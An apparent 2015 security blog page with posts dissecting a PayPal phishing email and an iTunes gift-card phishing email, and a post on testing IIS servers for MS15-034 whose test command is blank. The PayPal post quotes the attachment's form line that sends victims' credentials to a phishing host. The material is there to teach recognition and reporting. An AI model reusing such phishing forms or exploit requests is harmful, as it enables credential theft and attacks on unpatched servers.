Sunday, June 21, 2015

Phishing Email - Your PayPal Confirmation Alert ✓

Just got hit with the "Your PayPal Confirmation Alert  ✓" phishing email.

This email is crafty since the message is email header is composed well and all the sources seem to come from PayPal, but the real threat comes from the attached document which it asks you to fill out. 

This email will try to steal your identity on PayPal and also has a browser jack file file. 


The email subject line; 

"Your PayPal Confirmation Alert  ✓"


The email reads, but the give away this is misspelling of Thank you.



PayPal
Dear Customer,
This is an automatic message by the system to let you know that you have to confirm your account information within 48 hours.
Your account has been frozen temporarily in order to protect it.
The account will continue to be frozen until it is approved and validate your account information.
This will help protect you in the future. The process does not take more than 3 minutes.
To proceed to confirm your account information please follow the instructions that will be required
  1. Download the attached document and open it in a browser window secure.
  2. Confirm that you are the account holder and follow the instructions.


Tank You,
PayPal



The attached document is name PayPal-Alert.htm and contains a form to direct all your personal information to be sent to this URL address...


f o r m action="http://www.youyourk.com/id.php" id="main" method="POST" name="main">



Action > Report the Phishing URL to Google Plex now, click this link
  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=www.youyourk.com


The attached document cleansed pre-view



PayPal ID and Password

Enter your primary email address as your Paypal ID.



Please enter your information.










Mailing Address

Please enter your mailing address.



Profile of credit card


 






Action > Report the Phishing URL to Google Plex now, click this link
  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=www.youyourk.com

Friday, May 22, 2015

Phishing Email - You sent a iTunes Gift Card $50

Recently the  "You sent a iTunes Gift Card $50 CAD" email has come in many flavors, and if it matches the items below, then there a good chance it's phishing email. But I walk you through how to tell for sure. This crafty email has been making it's way through the big 3 email (google/outlook/yahoo) email spam filters.

What to do? 
Report them, hover over the Click here To Cancel This Transaction link (in your email) and match the URL and click on the match link to report them as phishing to Google.

Report Phishing
 URLs at Google now 

If you have recievied this email take further action now by click these links

  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=youtubewom.com

You sent a iTunes Gift Card $50 CAD to (slowdawn12@msn.co.ok) Thanks for using iTunes. To see all the transaction details, log in to your Apple account. (Order Number:115757250)

22 May 2015 02:01:11 BST

Transaction ID: 4V929066CK353413N
You sent a iTunes Gift Card $50 CAD to (slowdawn12@msn.co.ok)
Thanks for using iTunes. To see all the transaction details, log in to your Apple account.


Seller
eBay Checkout
Note to seller
iTunes Code (Email Delivery)
Address Email - NO confirmed


Dispatch details
The seller hasnt provided any dispatch details yet.


DescriptionUnit priceQtyAmount
Click here To Cancel This Transaction
iTunes Gift Card Number 331027592910
$50 CAD1$50 CAD
Postage and packaging50 CAD
Insurance - not offered----
Total$50 CAD






How to tell this is a Phishing email ?


  1. Is email is from you to you, then it's phishing.
  2. Hover over all links in email, if it's not from the apple.com site then forget it.

    In above example, all the links and source images seem to be from Apple website except the Click here To Cancel This Transaction link.

    You can test this
     in the above example, since I crafted that from source HTML of the phishing email. Try it, hover over links to examine the source URL. Note: I have re-coded Click here To Cancel This Transaction to report youtubewom.com as phishing site to Google.

    In the original phishing email, hovering over Click here To Cancel This Transaction pointed to spam site youtubeworm.com. 


    Reading email in Outlook 2013 generated pop-up "Click to follow link"

Report Phishing URLs at Google now 

If you have recieved this email take further action now by click the link below. Hover over the Click here To Cancel This Transaction link and match the URL and click on the match link to report them as phishing to Google.

  1. https://www.google.com/safebrowsing/report_phish/?hl=en&url=youtubewom.com

If you don't see your URL here add a comment below.

Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Thursday, April 16, 2015

How to test for Critical Microsoft IIS Vulnerabilty (MS15-034) Allow Remote Code Execution

Critical Microsoft IIS Vulnerabilty (MS15-034) released April 14, 2015

Allows is a vulnerability in HTTP.sys Could Allow Remote Code Execution on unpatched IIS, on all Windows x64 systems affected. 

Full details of the security bulltein provided by Microsoft at https://technet.microsoft.com/library/security/MS15-034

This vulnerability can allow a remote and unauthenticated denial of service (DoS) and a possible remote code execution (RCE). An attacker sends a specially crafted http request with the correct header to exploit it.

To identify if your Windows server is vulnerable, run the following command under another another Unix/Linux/Mac bash shell. Substitute your windows machine up address with SERVER_IP. 


If you get the following response then it’s vulnerable:
















In fact if any part of the response contains "Requested Range Not Satisfiable" then you are vulnerable, whether its a header response as HTTP/1.1 416 Requested Range Not Satisfiable or wrapped in HTML tags.


The stated temporary workaround in the bulletin is to “Disable IIS kernel caching”, in IIS, until you get patched. 

Play safe my friends.